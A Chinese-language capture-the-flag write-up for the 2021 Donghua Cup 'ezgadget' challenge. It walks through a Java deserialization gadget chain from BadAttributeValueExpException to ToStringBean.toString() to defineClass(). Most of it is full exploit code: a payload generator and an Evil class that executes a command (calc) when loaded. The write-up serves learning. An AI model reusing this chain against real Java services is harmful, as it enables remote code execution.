附件传不上来欸,直接看题吧
首先看路由发现反序列化的点
接着看pom.xml
找有无利用的第三方组件
似乎只有 spring-boot,然后看其他源码,发现ToStringBean.java#toString()
里面有defineClass()
,这是好东西哇,在ClassLoader(类加载器)里面提到这是加载字节码的东西,所以目标明确,从 readObject()走到 toString()再到 defineClass(),正好在CC5中有 BadAttributeValueExpException 调用了 toString,所以直接一把梭
package com.yq1ng.ezgadget;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.net.URLEncoder;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
/**
* @author ying
* @Description 东华杯2021
* @create 2021-11-10 5:27 PM
*/
public class GetFlag {
public static void main(String[] args) throws Exception{
// 利用cc5后半段
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Class clazz = Class.forName("javax.management.BadAttributeValueExpException");
Field field = clazz.getDeclaredField("val");
field.setAccessible(true);
com.ezgame.ctf.tools.ToStringBean toStringBean = new com.ezgame.ctf.tools.ToStringBean();
field.set(badAttributeValueExpException,toStringBean);
// byte[] classByte = Base64.getDecoder().decode("yv66vgAAADQAKQoACAAZCgAaABsIABwKABoAHQcAHgoABQAfBwAgBwAhAQAJdHJhbnNmb3JtAQBy"+"KExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9v"+"cmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylW"+"AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHACIBAKYoTGNvbS9zdW4vb3Jn"+"L2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwv"+"aW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRl"+"cm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAGPGluaXQ+AQADKClWAQAN"+"U3RhY2tNYXBUYWJsZQcAIAcAHgEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAKU291"+"cmNlRmlsZQEACUV2aWwuamF2YQwAEAARBwAjDAAkACUBAA9jbWQgL2MgY2FsYy5leGUMACYAJwEA"+"E2phdmEvbGFuZy9FeGNlcHRpb24MACgAEQEABEV2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFs"+"YW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcv"+"YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQARamF2YS9sYW5n"+"L1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhM"+"amF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAD3ByaW50U3RhY2tUcmFjZQAh"+"AAcACAAAAAAABAABAAkACgACAAsAAAAZAAAAAwAAAAGxAAAAAQAMAAAABgABAAAAEAANAAAABAAB"+"AA4AAQAJAA8AAgALAAAAGQAAAAQAAAABsQAAAAEADAAAAAYAAQAAABQADQAAAAQAAQAOAAEAEAAR"+"AAEACwAAAGAAAgACAAAAFiq3AAG4AAISA7YABFenAAhMK7YABrEAAQAEAA0AEAAFAAIADAAAABoA"+"BgAAABYABAAYAA0AHAAQABoAEQAbABUAHQASAAAAEAAC/wAQAAEHABMAAQcAFAQACQAVABYAAQAL"+"AAAAGQAAAAEAAAABsQAAAAEADAAAAAYAAQAAACAAAQAXAAAAAgAY");
byte[] classByte = Files.readAllBytes(Paths.get("F:\\study\\temp\\target\\classes\\com\\yq1ng\\ezgadget\\Evil.class"));
clazz = Class.forName("com.ezgame.ctf.tools.ToStringBean");
field = clazz.getDeclaredField("ClassByte");
field.setAccessible(true);
field.set(toStringBean,classByte);
ByteArrayOutputStream bout = new ByteArrayOutputStream();
ObjectOutputStream oout = new ObjectOutputStream(bout);
oout.writeUTF("gadgets");
oout.writeInt(2021);
oout.writeObject(badAttributeValueExpException);
byte[] bytes = bout.toByteArray();
byte[] encode = Base64.getEncoder().encode(bytes);
System.out.println(URLEncoder.encode(new String(encode)));
}
}
package com.yq1ng.ezgadget;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
/**
* @author ying
* @Description
* @create 2021-11-10 5:20 PM
*/
public class Evil extends AbstractTranslet {
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
public Evil() {
try {
Runtime.getRuntime().exec("calc");
}
catch (Exception ex) {
ex.printStackTrace();
}
}
public static void main(final String[] array) {
}
}
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package com.ezgame.ctf.tools;
import java.io.Serializable;
public class ToStringBean extends ClassLoader implements Serializable {
private byte[] ClassByte;
public ToStringBean() {
}
public String toString() {
ToStringBean toStringBean = new ToStringBean();
Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
Object var3 = null;
try {
var3 = clazz.newInstance();
} catch (InstantiationException var5) {
var5.printStackTrace();
} catch (IllegalAccessException var6) {
var6.printStackTrace();
}
return "enjoy it.";
}
}